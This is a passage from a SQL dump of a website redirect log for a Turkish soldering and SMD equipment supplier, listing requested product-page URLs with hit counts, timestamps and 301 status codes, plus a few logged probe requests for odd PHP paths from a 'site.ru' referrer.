19:40:20','0000-00-00 00:00:00',301),(13015,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,mf_name/dirdesc?language=en-gb',NULL,'','',2,0,'2017-11-21 19:40:43','0000-00-00 00:00:00',301),(13016,'http://www.3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by?`p`.product_sku/dirdesc&language=en-gb',NULL,'','',1,0,'2017-11-21 19:41:39','0000-00-00 00:00:00',301),(13017,'https://www.3s-technologies.com.tr/index.php/en/products/çubuk-lehim?language=en-gb',NULL,'','',1,0,'2017-11-21 19:41:44','0000-00-00 00:00:00',301),(13018,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/dalga-lehim/by?category_name&language=en-gb',NULL,'','',1,0,'2017-11-21 19:41:54','0000-00-00 00:00:00',301),(13019,'http://www.3s-technologies.com.tr/index.php/en/products/krem-lehim/by?`p`.product_sku/dirdesc&language=en-gb',NULL,'','',1,0,'2017-11-21 19:41:57','0000-00-00 00:00:00',301),(13020,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by?language=en-gb&mf_name',NULL,'','',1,0,'2017-11-21 19:42:16','0000-00-00 00:00:00',301),(13021,'https://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,category_name?language=en-gb',NULL,'','',1,0,'2017-11-21 19:42:59','0000-00-00 00:00:00',301),(13022,'http://www.3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by?category_name&language=en-gb',NULL,'','',1,0,'2017-11-21 19:43:05','0000-00-00 00:00:00',301),(13023,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by?category_name&language=en-gb',NULL,'','',1,0,'2017-11-21 19:43:09','0000-00-00 00:00:00',301),(13024,'http://www.3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/by?language=en-gb&mf_name',NULL,'','',1,0,'2017-11-21 19:43:14','0000-00-00 00:00:00',301),(13025,'http://3s-technologies.com.tr/tr/urunler/2-el-makineler/by,product_name',NULL,'','',8,0,'2017-11-21 19:43:20','0000-00-00 00:00:00',301),(13026,'http://www.3s-technologies.com.tr/index.php/en/products/smd-5,000cph',NULL,'','',1,0,'2017-11-21 19:43:21','0000-00-00 00:00:00',301),(13027,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by?category_name&language=en-gb',NULL,'','',1,0,'2017-11-21 19:43:48','0000-00-00 00:00:00',301),(13028,'https://www.3s-technologies.com.tr/index.php/en/products/rh6-detail?print=1&tmpl=component',NULL,'','',1,0,'2017-11-21 19:44:02','0000-00-00 00:00:00',301),(13029,'https://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,mf_name/dirdesc?error=404&language=en-gb',NULL,'','',1,0,'2017-11-21 19:44:05','0000-00-00 00:00:00',301),(13030,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/flux/by?`p`.product_sku&language=en-gb',NULL,'','',1,0,'2017-11-21 19:44:11','0000-00-00 00:00:00',301),(13031,'http://3s-technologies.com.tr/en/products/bölgesel-lehimleme/by,category_name',NULL,'','',411,0,'2017-11-21 19:44:15','0000-00-00 00:00:00',301),(13032,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,product_name/dirdesc?language=en-gb',NULL,'','',2,0,'2017-11-21 19:44:17','0000-00-00 00:00:00',301),(13033,'http://3s-technologies.com.tr/index.php/en/products',NULL,'','',22,0,'2017-11-21 19:44:24','0000-00-00 00:00:00',301),(13034,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/dalga-lehim/by?language=en-gb&product_sku',NULL,'','',1,0,'2017-11-21 19:44:28','0000-00-00 00:00:00',301),(13035,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/screen-printer/by?language=en-gb&mf_name',NULL,'','',1,0,'2017-11-21 19:44:34','0000-00-00 00:00:00',301),(13036,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/by,mf_name/dirdesc?language=en-gb',NULL,'','',8,0,'2017-11-21 19:44:38','0000-00-00 00:00:00',301),(13037,'http://3s-technologies.com.tr/index.php/en/products/flux/by,ordering?language=en-gb',NULL,'','',8,0,'2017-11-21 19:44:40','0000-00-00 00:00:00',301),(13038,'https://www.3s-technologies.com.tr/index.php/en/products/tel-lehim?language=en-gb',NULL,'','',1,0,'2017-11-21 19:44:44','0000-00-00 00:00:00',301),(13039,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/screen-printer/by?`p`.product_sku/dirdesc&language=en-gb',NULL,'','',1,0,'2017-11-21 19:44:50','0000-00-00 00:00:00',301),(13040,'http://3s-technologies.com.tr/index.php/en/products/screen-printer/by,ordering?language=en-gb',NULL,'','',15,0,'2017-11-21 19:44:50','0000-00-00 00:00:00',301),(13041,'http://www.3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by?category_name&language=en-gb',NULL,'','',1,0,'2017-11-21 19:44:52','0000-00-00 00:00:00',301),(13042,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/flux/by,mf_name/dirdesc?language=en-gb',NULL,'','',8,0,'2017-11-21 19:44:52','0000-00-00 00:00:00',301),(13043,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,mf_name?language=en-gb',NULL,'','',2,0,'2017-11-21 19:45:00','0000-00-00 00:00:00',301),(13044,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/flux/by?language=en-gb&product_name',NULL,'','',1,0,'2017-11-21 19:45:04','0000-00-00 00:00:00',301),(13045,'https://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-21 19:45:06','0000-00-00 00:00:00',301),(13046,'http://www.3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by?language=en-gb&product_name',NULL,'','',1,0,'2017-11-21 19:45:06','0000-00-00 00:00:00',301),(13047,'http://3s-technologies.com.tr/index.php/en/products/thru-hole/by?language=en-gb&mf_name',NULL,'','',1,0,'2017-11-21 19:45:09','0000-00-00 00:00:00',301),(13048,'https://www.3s-technologies.com.tr/index.php/en/products/2.-el-makineler/by,product_name?language=en-gb',NULL,'','',1,0,'2017-11-21 19:45:10','0000-00-00 00:00:00',301),(13049,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim/by?language=en-gb&mf_name',NULL,'','',1,0,'2017-11-21 19:45:12','0000-00-00 00:00:00',301),(13050,'http://3s-technologies.com.tr/index.php/en/products/tel-lehim/by,mf_name?language=en-gb',NULL,'','',21,0,'2017-11-21 19:45:14','0000-00-00 00:00:00',301),(13051,'http://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',2,0,'2017-11-21 19:45:19','0000-00-00 00:00:00',301),(13052,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/screen-printer/by,mf_name/dirdesc?language=en-gb',NULL,'','',8,0,'2017-11-21 19:45:21','0000-00-00 00:00:00',301),(13053,'http://www.3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by?category_name/dirdesc&language=en-gb',NULL,'','',1,0,'2017-11-21 19:45:28','0000-00-00 00:00:00',301),(13054,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo',NULL,'','',12,0,'2017-11-21 19:45:34','0000-00-00 00:00:00',301),(13055,'http://3s-technologies.com.tr/index.php/en/products/krem-lehim/dirdesc?language=en-gb',NULL,'','',12,0,'2017-11-21 19:45:41','0000-00-00 00:00:00',301),(13056,'http://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/ess-310-detail',NULL,'','',60,0,'2017-11-21 19:46:00','0000-00-00 00:00:00',301),(13057,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,mf_name?language=en-gb',NULL,'','',14,0,'2017-11-21 19:46:09','0000-00-00 00:00:00',301),(13058,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/flux/dirdesc?language=en-gb',NULL,'','',16,0,'2017-11-21 19:46:18','0000-00-00 00:00:00',301),(13059,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/dalga-lehim/dirdesc?language=en-gb',NULL,'','',21,0,'2017-11-21 19:46:30','0000-00-00 00:00:00',301),(13060,'https://www.3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,product_name?language=en-gb',NULL,'','',1,0,'2017-11-21 19:46:43','0000-00-00 00:00:00',301),(13061,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/dirdesc?language=en-gb',NULL,'','',6,0,'2017-11-21 19:46:44','0000-00-00 00:00:00',301),(13062,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-fırın/by,product_sku',NULL,'','',406,0,'2017-11-21 19:46:46','0000-00-00 00:00:00',301),(13063,'http://3s-technologies.com.tr/index.php/en/products/screen-printer/sp-18p-l-detail',NULL,'','',21,0,'2017-11-21 19:46:49','0000-00-00 00:00:00',301),(13064,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/screen-printer/by?language=en-gb&product_name',NULL,'','',1,0,'2017-11-21 19:46:57','0000-00-00 00:00:00',301),(13065,'http://3s-technologies.com.tr/index.php/en/products/2.-el-makineler/dirdesc?language=en-gb',NULL,'','',9,0,'2017-11-21 19:47:00','0000-00-00 00:00:00',301),(13066,'https://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,product_name?error=404&language=en-gb',NULL,'','',1,0,'2017-11-21 19:47:03','0000-00-00 00:00:00',301),(13067,'https://www.3s-technologies.com.tr/index.php/en/products/smd-fırın/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-21 19:47:06','0000-00-00 00:00:00',301),(13068,'https://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/screen-printer/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-21 19:47:09','0000-00-00 00:00:00',301),(13069,'http://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,category_name/dirdesc?language=en-gb',NULL,'','',2,0,'2017-11-21 19:47:10','0000-00-00 00:00:00',301),(13070,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by?language=en-gb&product_name',NULL,'','',1,0,'2017-11-21 19:47:12','0000-00-00 00:00:00',301),(13071,'https://www.3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-21 19:47:12','0000-00-00 00:00:00',301),(13072,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,mf_name/dirdesc?language=en-gb',NULL,'','',2,0,'2017-11-21 19:47:13','0000-00-00 00:00:00',301),(13073,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız?language=en-gb',NULL,'','',6,0,'2017-11-21 19:47:21','0000-00-00 00:00:00',301),(13074,'https://www.3s-technologies.com.tr/index.php/en/products/cs40-detail?print=1&tmpl=component',NULL,'','',1,0,'2017-11-21 19:47:23','0000-00-00 00:00:00',301),(13075,'http://3s-technologies.com.tr/index.php/en/products/thru-hole/by,mf_name/dirdesc?language=en-gb',NULL,'','',8,0,'2017-11-21 19:47:24','0000-00-00 00:00:00',301),(13076,'http://3s-technologies.com.tr/index.php/en/products/tel-lehim/by,mf_name/dirdesc?language=en-gb',NULL,'','',15,0,'2017-11-21 19:47:26','0000-00-00 00:00:00',301),(13077,'http://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/ess-310-24-detail',NULL,'','',58,0,'2017-11-21 19:47:28','0000-00-00 00:00:00',301),(13078,'http://www.3s-technologies.com.tr/index.php/en/products/screen-printer/by?language=en-gb&product_name',NULL,'','',1,0,'2017-11-21 19:47:29','0000-00-00 00:00:00',301),(13079,'http://3s-technologies.com.tr/en/products/thru-hole/by,category_name',NULL,'','',11,0,'2017-11-21 19:47:31','0000-00-00 00:00:00',301),(13080,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/by,product_name?language=en-gb',NULL,'','',26,0,'2017-11-21 19:47:33','0000-00-00 00:00:00',301),(13081,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by?language=en-gb&ordering',NULL,'','',1,0,'2017-11-21 19:47:35','0000-00-00 00:00:00',301),(13082,'http://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme?language=en-gb',NULL,'','',1,0,'2017-11-21 19:47:36','0000-00-00 00:00:00',301),(13083,'http://www.3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by?language=en-gb&mf_name',NULL,'','',1,0,'2017-11-21 19:47:36','0000-00-00 00:00:00',301),(13084,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,product_name',NULL,'','',438,0,'2017-11-21 19:47:38','0000-00-00 00:00:00',301),(13085,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/dalga-lehim/by,product_name?language=en-gb',NULL,'','',13,0,'2017-11-21 19:47:41','0000-00-00 00:00:00',301),(13086,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/screen-printer',NULL,'','',19,0,'2017-11-21 19:47:48','0000-00-00 00:00:00',301),(13087,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/dalga-lehim',NULL,'','',24,0,'2017-11-21 19:47:50','0000-00-00 00:00:00',301),(13088,'http://3s-technologies.com.tr/index.php/en/products/smd-fırın/by,ordering?language=en-gb',NULL,'','',2,0,'2017-11-21 19:47:53','0000-00-00 00:00:00',301),(13089,'https://www.3s-technologies.com.tr/index.php/en/products/flux?language=en-gb',NULL,'','',1,0,'2017-11-21 19:47:55','0000-00-00 00:00:00',301),(13090,'http://www.3s-technologies.com.tr/index.php/en/products/smd-5?000cph',NULL,'','',1,0,'2017-11-21 19:48:00','0000-00-00 00:00:00',301),(13091,'http://3s-technologies.com.tr/en/products/zero-ion-g3-detail?tmpl=component&print=1',NULL,'','',20,0,'2017-11-21 19:48:04','0000-00-00 00:00:00',301),(13092,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by?language=en-gb&ordering',NULL,'','',1,0,'2017-11-21 19:48:07','0000-00-00 00:00:00',301),(13093,'http://3s-technologies.com.tr/index.php/en/products/thru-hole/by,mf_name?language=en-gb',NULL,'','',22,0,'2017-11-21 19:48:09','0000-00-00 00:00:00',301),(13094,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,product_sku?language=en-gb',NULL,'','',4,0,'2017-11-21 19:48:12','0000-00-00 00:00:00',301),(13095,'https://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2017-11-21 19:48:17','0000-00-00 00:00:00',301),(13096,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/by,ordering?language=en-gb',NULL,'','',7,0,'2017-11-21 19:48:20','0000-00-00 00:00:00',301),(13097,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/screen-printer/by?category_name&language=en-gb',NULL,'','',1,0,'2017-11-21 19:48:35','0000-00-00 00:00:00',301),(13098,'http://3s-technologies.com.tr/index.php/en/products/thru-hole/by?language=en-gb&product_name',NULL,'','',1,0,'2017-11-21 19:48:44','0000-00-00 00:00:00',301),(13099,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim?language=en-gb',NULL,'','',1,0,'2017-11-21 19:48:47','0000-00-00 00:00:00',301),(13100,'http://3s-technologies.com.tr/en/products/smd-ultra-hız/by,product_name',NULL,'','',391,0,'2017-11-21 19:48:51','0000-00-00 00:00:00',301),(13101,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri',NULL,'','',25,0,'2017-11-21 19:49:01','0000-00-00 00:00:00',301),(13102,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/by,pc.ordering,product_name/dirdesc/results,1-20',NULL,'','',4,0,'2017-11-21 19:52:35','0000-00-00 00:00:00',301),(13103,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.4mm-29-detail',NULL,'','',7,0,'2017-11-21 19:52:58','0000-00-00 00:00:00',301),(13104,'http://3s-technologies.com.tr/en/products/ly-8c-detail?tmpl=component&print=1',NULL,'','',16,0,'2017-11-21 19:58:32','0000-00-00 00:00:00',301),(13105,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,product_sku',NULL,'','',8,0,'2017-11-21 19:59:49','0000-00-00 00:00:00',301),(13106,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.6mm-detail',NULL,'','',28,0,'2017-11-21 20:04:26','0000-00-00 00:00:00',301),(13107,'http://3s-technologies.com.tr/tr/setupconfig/popup-pomo.php',NULL,'http://site.ru','',8,0,'2017-11-21 20:05:39','0000-00-00 00:00:00',301),(13108,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim',NULL,'','',25,0,'2017-11-21 20:17:43','0000-00-00 00:00:00',301),(13109,'http://3s-technologies.com.tr/tr/modx.php',NULL,'http://site.ru','',10,0,'2017-11-21 20:19:07','0000-00-00 00:00:00',301),(13110,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı',NULL,'','',225,0,'2017-11-21 20:20:01','0000-00-00 00:00:00',301),(13111,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/2.-el-makineler/by,product_name',NULL,'','',1,0,'2017-11-21 20:21:28','0000-00-00 00:00:00',301),(13112,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by?`p`.product_sku&language=en-gb',NULL,'','',1,0,'2017-11-21 20:24:15','0000-00-00 00:00:00',301),(13113,'http://www.3s-technologies.com.tr/index.php/en/products/screen-printer/by?category_name&language=en-gb',NULL,'','',1,0,'2017-11-21 20:25:10','0000-00-00 00:00:00',301),(13114,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-11-21 20:31:31','0000-00-00 00:00:00',301),(13115,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lfs-1-detail?tmpl=component&print=1',NULL,'','',7,0,'2017-11-21 20:35:54','0000-00-00 00:00:00',301),(13116,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/screen-printer/by?language=en-gb&mf_name/dirdesc',NULL,'','',1,0,'2017-11-21 20:35:57','0000-00-00 00:00:00',301),(13117,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/screen-printer/by?category_name&language=en-gb',NULL,'','',1,0,'2017-11-21 20:36:42','0000-00-00 00:00:00',301),(13118,'http://www.3s-technologies.com.tr/index.php/en/products/krem-lehim/by?language=en-gb&product_sku',NULL,'','',1,0,'2017-11-21 20:37:21','0000-00-00 00:00:00',301),(13119,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,mf_name/results,1-20',NULL,'','',1,0,'2017-11-21 20:45:33','0000-00-00 00:00:00',301),(13120,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_name',NULL,'','',393,0,'2017-11-21 20:47:11','0000-00-00 00:00:00',301),(13121,'http://www.3s-technologies.com.tr/index.php/en/products/screen-printer/by?language=en-gb&mf_name',NULL,'','',1,0,'2017-11-21 20:51:19','0000-00-00 00:00:00',301),(13122,'https://www.3s-technologies.com.tr/index.php/en/products/flux/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-21 20:54:11','0000-00-00 00:00:00',301),(13123,'https://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/screen-printer/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-21 20:54:43','0000-00-00 00:00:00',301),(13124,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim/by,`p`.product_sku?language=en-gb',NULL,'','',14,0,'2017-11-21 20:59:51','0000-00-00 00:00:00',301),(13125,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,category_name/dirdesc/results,1-20',NULL,'','',4,0,'2017-11-21 21:06:42','0000-00-00 00:00:00',301),(13126,'http://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/by?language=en-gb&mf_name',NULL,'','',1,0,'2017-11-21 21:07:05','0000-00-00 00:00:00',301),(13127,'http://3s-technologies.com.tr/en/products/smd-fırın/by,product_sku',NULL,'','',406,0,'2017-11-21 21:12:21','0000-00-00 00:00:00',301),(13128,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/dirdesc?language=en-gb',NULL,'','',5,0,'2017-11-21 21:14:23','0000-00-00 00:00:00',301),(13129,'http://3s-technologies.com.tr/index.php/en/products/dalga-lehim/by,mf_name?language=en-gb',NULL,'','',12,0,'2017-11-21 21:22:05','0000-00-00 00:00:00',301),(13130,'http://3s-technologies.com.tr/index.php/en/products/flux/by,mf_name?language=en-gb',NULL,'','',21,0,'2017-11-21 21:26:13','0000-00-00 00:00:00',301),(13131,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/flux/by?language=en-gb&product_sku',NULL,'','',1,0,'2017-11-21 21:27:16','0000-00-00 00:00:00',301),(13132,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,category_name',NULL,'','',15,0,'2017-11-21 21:29:26','0000-00-00 00:00:00',301),(13133,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_sku?language=en-gb',NULL,'','',1,0,'2017-11-21 21:29:46','0000-00-00 00:00:00',301),(13134,'http://3s-technologies.com.tr/index.php/en/products/thru-hole/av132-detail',NULL,'','',23,0,'2017-11-21 21:32:18','0000-00-00 00:00:00',301),(13135,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,`p`.product_sku/results,1-5',NULL,'','',4,0,'2017-11-21 21:33:11','0000-00-00 00:00:00',301),(13136,'http://www.3s-technologies.com.tr/tr/urunler/screen-printer/by,product_name',NULL,'','',48,0,'2017-11-21 21:38:28','0000-00-00 00:00:00',301),(13137,'http://www.3s-technologies.com.tr/index.php/en/products/smd-fırın/by?language=en-gb&product_name',NULL,'','',1,0,'2017-11-21 21:38:47','0000-00-00 00:00:00',301),(13138,'https://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/by?category_name/dirdesc&error=404&language=en-gb',NULL,'','',1,0,'2017-11-21 21:41:20','0000-00-00 00:00:00',301),(13139,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',182,0,'2017-11-21 21:43:46','0000-00-00 00:00:00',301),(13140,'http://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/by?language=en-gb&product_sku',NULL,'','',1,0,'2017-11-21 21:51:47','0000-00-00 00:00:00',301),(13141,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,mf_name/results,1-10',NULL,'','',3,0,'2017-11-21 21:54:21','0000-00-00 00:00:00',301),(13142,'http://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by?category_name&language=en-gb',NULL,'','',1,0,'2017-11-21 21:55:01','0000-00-00 00:00:00',301),(13143,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/by,pc.ordering,product_name/dirdesc/results,1-50',NULL,'','',1,0,'2017-11-21 21:59:39','0000-00-00 00:00:00',301),(13144,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,`p`.product_sku/dirdesc/results,1-5',NULL,'','',7,0,'2017-11-21 22:04:56','0000-00-00 00:00:00',301),(13145,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/tel-lehim/by,product_sku',NULL,'','',13,0,'2017-11-21 22:07:09','0000-00-00 00:00:00',301),(13146,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/screen-printer/by?language=en-gb&product_sku',NULL,'','',1,0,'2017-11-21 22:07:11','0000-00-00 00:00:00',301),(13147,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by?category_name&language=en-gb',NULL,'','',1,0,'2017-11-21 22:11:10','0000-00-00 00:00:00',301),(13148,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,category_name?language=en-gb',NULL,'','',7,0,'2017-11-21 22:14:37','0000-00-00 00:00:00',301),(13149,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/screen-printer/by?language=en-gb&mf_name',NULL,'','',1,0,'2017-11-21 22:16:49','0000-00-00 00:00:00',301),(13150,'http://3s-technologies.com.tr/en/products/temizleme-makineleri/by,mf_name',NULL,'','',21,0,'2017-11-21 22:21:42','0000-00-00 00:00:00',301),(13151,'http://www.3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/ls60v-detail/askquestion?tmpl=component',NULL,'','',54,0,'2017-11-21 22:21:58','0000-00-00 00:00:00',301),(13152,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/screen-printer/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',23,0,'2017-11-21 22:25:29','0000-00-00 00:00:00',301),(13153,'http://www.3s-technologies.com.tr/tr/create-an-account.html',NULL,'http://www.3s-technologies.com.tr/tr/create-an-account.html','',1,0,'2017-11-21 22:26:50','0000-00-00 00:00:00',301),(13154,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,mf_name/results,1-10',NULL,'','',9,0,'2017-11-21 22:31:24','0000-00-00 00:00:00',301),(13155,'http://www.3s-technologies.com.tr/index.php/en/products/thru-hole/by,mf_name/dirdesc?language=en-gb',NULL,'','',24,0,'2017-11-21 22:37:23','0000-00-00 00:00:00',301),(13156,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by?language=en-gb&product_sku',NULL,'','',1,0,'2017-11-21 22:39:42','0000-00-00 00:00:00',301),(13157,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim/dirdesc',NULL,'','',20,0,'2017-11-21 22:40:21','0000-00-00 00:00:00',301),(13158,'http://3s-technologies.com.tr/tr/urunler/temizleme-makineleri/dirdesc',NULL,'','',19,0,'2017-11-21 22:40:23','0000-00-00 00:00:00',301),(13159,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,product_name',NULL,'','',17,0,'2017-11-21 22:40:24','0000-00-00 00:00:00',301),(13160,'https://www.3s-technologies.com.tr/index.php/en/products/2.-el-makineler/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-21 22:40:36','0000-00-00 00:00:00',301),(13161,'http://www.3s-technologies.com.tr/en/products/bölgesel-lehimleme/by,pc.ordering,product_name',NULL,'','',661,0,'2017-11-21 22:42:29','0000-00-00 00:00:00',301),(13162,'http://www.3s-technologies.com.tr/en/products/bölgesel-lehimleme/by,pc.ordering,product_name/dirdesc',NULL,'','',663,0,'2017-11-21 22:42:35','0000-00-00 00:00:00',301),(13163,'http://www.3s-technologies.com.tr/en/products/bölgesel-lehimleme/by,product_name/dirdesc',NULL,'','',678,0,'2017-11-21 22:42:51','0000-00-00 00:00:00',301),(13164,'http://3s-technologies.com.tr/tr/includes/js/tabs/log.php',NULL,'http://site.ru','',2,0,'2017-11-21 22:43:08','0000-00-00 00:00:00',301),(13165,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/by,category_name?error=404',NULL,'','',4,0,'2017-11-21 22:43:31','0000-00-00 00:00:00',301),(13166,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim/by,category_name',NULL,'','',689,0,'2017-11-21 22:44:20','0000-00-00 00:00:00',301),(13167,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim/by,pc.ordering,product_name',NULL,'','',641,0,'2017-11-21 22:45:08','0000-00-00 00:00:00',301),(13168,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim/by,pc.ordering,product_name/dirdesc',NULL,'','',633,0,'2017-11-21 22:45:15','0000-00-00 00:00:00',301),(13169,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_name/dirdesc',NULL,'','',631,0,'2017-11-21 22:45:31','0000-00-00 00:00:00',301),(13170,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-hızlı/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-21 22:45:52','0000-00-00 00:00:00',301),(13171,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın',NULL,'','',110,0,'2017-11-21 22:46:08','0000-00-00 00:00:00',301),(13172,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,`p`.product_sku/results,1-50',NULL,'','',4,0,'2017-11-21 22:47:17','0000-00-00 